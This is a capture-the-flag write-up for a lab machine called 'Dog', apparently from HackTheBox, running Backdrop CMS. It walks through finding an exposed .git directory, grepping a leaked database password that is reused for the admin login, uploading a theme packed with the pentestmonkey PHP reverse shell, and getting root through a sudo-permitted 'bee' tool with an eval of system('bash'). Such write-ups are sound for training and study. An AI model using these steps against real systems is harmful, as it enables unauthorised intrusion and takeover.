Linux - Easy - Dog

Created At: Updated At:

Recon

Only 22 and 80 are open.
Subdomain search is impossible, returns always 200 and different sizes.
Main site is powered by backdrop cms.

└──╼ $dirsearch --url 10.129.45.144

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/user/reports/_10.129.45.144/_25-03-10_21-16-23.txt

Target: http://10.129.45.144/

[21:16:24] Starting: 
[21:16:26] 301 -  313B  - /.git  ->  http://10.129.45.144/.git/
[21:16:27] 200 -   23B  - /.git/HEAD
[21:16:27] 200 -  412B  - /.git/branches/
[21:16:27] 200 -   95B  - /.git/COMMIT_EDITMSG
[21:16:27] 200 -   92B  - /.git/config
[21:16:27] 200 -  607B  - /.git/
[21:16:27] 200 -   73B  - /.git/description
[21:16:27] 200 -  653B  - /.git/hooks/
[21:16:27] 200 -  240B  - /.git/info/exclude
[21:16:27] 200 -  458B  - /.git/info/
[21:16:27] 301 -  329B  - /.git/logs/refs/heads  ->  http://10.129.45.144/.git/logs/refs/heads/
[21:16:27] 200 -  230B  - /.git/logs/HEAD
[21:16:27] 200 -  479B  - /.git/logs/
[21:16:27] 301 -  323B  - /.git/logs/refs  ->  http://10.129.45.144/.git/logs/refs/
[21:16:27] 200 -  230B  - /.git/logs/refs/heads/master
[21:16:27] 301 -  324B  - /.git/refs/heads  ->  http://10.129.45.144/.git/refs/heads/
[21:16:27] 200 -   41B  - /.git/refs/heads/master
[21:16:27] 301 -  323B  - /.git/refs/tags  ->  http://10.129.45.144/.git/refs/tags/
[21:16:27] 200 -  463B  - /.git/refs/
[21:16:27] 200 -  337KB - /.git/index
[21:16:28] 200 -    2KB - /.git/objects/
[21:16:38] 301 -  313B  - /core  ->  http://10.129.45.144/core/
[21:16:40] 301 -  314B  - /files  ->  http://10.129.45.144/files/
[21:16:40] 200 -  588B  - /files/
[21:16:42] 404 -    2KB - /index.php/login/
[21:16:42] 200 -  458B  - /layouts/
[21:16:43] 200 -    7KB - /LICENSE.txt
[21:16:44] 301 -  316B  - /modules  ->  http://10.129.45.144/modules/
[21:16:44] 200 -  406B  - /modules/
[21:16:48] 200 -    5KB - /README.md
[21:16:51] 200 -  528B  - /robots.txt
[21:16:51] 403 -  278B  - /server-status
[21:16:51] 403 -  278B  - /server-status/
[21:16:52] 200 -    0B  - /settings.php
[21:16:52] 301 -  314B  - /sites  ->  http://10.129.45.144/sites/
[21:16:54] 301 -  315B  - /themes  ->  http://10.129.45.144/themes/
[21:16:54] 200 -  457B  - /themes/

We can downloead all of the files using gitdumper.
git log shows that there is only one commit, so nothing interesting there.
Looking for passwords is tedious, because of the amount but find and grep are handy.

grep -ri "\$database" . finds us ./settings.php:$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';

mysql is not accessible and these are not proper creds for the admin panel of backdrop CMS.

Looking further, with grep -ri "@dog.htb" . we can find ./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb".

We are in.

Abusing admin panel

We are abusing standard CMS trick, by uploading new theme to the CMS which will return us revshell when someone enters the website.

We have to create a new dir, add and modify modify http://pentestmonkey.net/tools/php-reverse-shell with our ip to it, add shell.info file (copied from other extension) and then tar it. We can upload it using “Manual instalation”. Then just try to access /modules/shell/shell.php to get rev shell.

There are two users on the server, jobert and johncusack and john is our first target as he has user.txt flag.

I tried reusing password for tiffany, BackDropJ2024DS2024 and got in.

Priv esc

We have our first and prob. last target on entrance.

bee is prob a tool to install backdrop.

Reading further, we can find nice advanced option.

Running arbitrary php with root privs makes us basicly a root, so we can just get shell with sudo /usr/local/bin/bee --root='/var/www/html/' ev 'system('bash')'